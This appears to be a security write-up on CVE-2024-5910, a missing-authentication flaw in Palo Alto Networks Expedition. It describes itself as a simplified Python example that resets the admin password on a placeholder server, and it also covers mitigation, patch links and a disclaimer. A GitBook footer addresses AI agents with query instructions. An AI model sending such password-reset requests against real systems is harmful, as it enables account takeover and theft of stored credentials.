> For the complete documentation index, see [llms.txt](https://calvin-lai.gitbook.io/calvin-lai-security/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://calvin-lai.gitbook.io/calvin-lai-security/exploit-cve-poc/exploiting-missing-authentication-in-palo-alto-networks-expedition.md).

# Exploiting Missing Authentication in Palo Alto Networks Expedition

**CVE-2024-5910** is a critical vulnerability in the Palo Alto Networks Expedition tool, which is used for firewall configuration migration and management. This vulnerability arises from missing authentication for a critical function, allowing an attacker with network access to take over an Expedition admin account. Once exploited, attackers can gain access to sensitive configuration secrets, credentials, and other data stored within the tool.

**Exploit Details**

The vulnerability can be exploited by sending a specially crafted request to an exposed endpoint, which resets the admin password. Here’s a simplified example of how the exploit might work:

1. **Identify the Vulnerable Endpoint**: The attacker identifies an exposed endpoint in the Expedition tool that lacks proper authentication.
2. **Craft the Exploit Request**: The attacker crafts a request to reset the admin password. This can be done using a simple HTTP request.

python

```
import requests

# URL of the vulnerable endpoint
url = "http://<target-expedition-server>/reset_admin_password"

# Crafting the exploit payload
payload = {
    "new_password": "NewSecurePassword123!"
}

# Sending the exploit request
response = requests.post(url, data=payload)

# Checking the response
if response.status_code == 200:
    print("Admin password reset successfully!")
else:
    print("Failed to reset admin password.")
```

3. **Execute the Exploit**: The attacker sends the crafted request to the vulnerable endpoint. If successful, the admin password is reset to a new value controlled by the attacker.
4. **Gain Access**: With the new admin password, the attacker can log in to the Expedition tool and access sensitive data, including configuration secrets and credentials.

**Mitigation**

To mitigate this vulnerability, it is essential to:

1. **Update Expedition**: Upgrade to Expedition version 1.2.92 or later, where the vulnerability has been fixed.
2. **Restrict Network Access**: Ensure that network access to the Expedition installation is restricted to authorized users, hosts, or networks.
3. **Monitor for Indicators of Compromise**: Regularly check for any signs of exploitation and take immediate action if any are found.

For more detailed guidance and updates, you can refer to the [CISA advisory](https://cyble.com/blog/cisa-finds-palo-alto-networks-cve-2024-5910-exploited-in-the-wild/) and other security advisories.

You can find the proof-of-concept (PoC) exploit for CVE-2024-5910 on GitHub. Here is the link to the repository:

[CVE-2024-5910 PoC on GitHub](https://github.com/horizon3ai/CVE-2024-5910)

{% hint style="warning" %}
**Warning:** All information on this page is provided solely for understanding the CVE-2024-5910 vulnerability and applying the patch as soon as possible. Unauthorized use of this information for any other purpose is strictly prohibited. Failure to apply the patch immediately may result in severe security risks, including unauthorized access and data theft.
{% endhint %}

For applying the patch for CVE-2024-5910, you can refer to the following link:

<https://security.paloaltonetworks.com/CVE-2024-5910>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://calvin-lai.gitbook.io/calvin-lai-security/exploit-cve-poc/exploiting-missing-authentication-in-palo-alto-networks-expedition.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
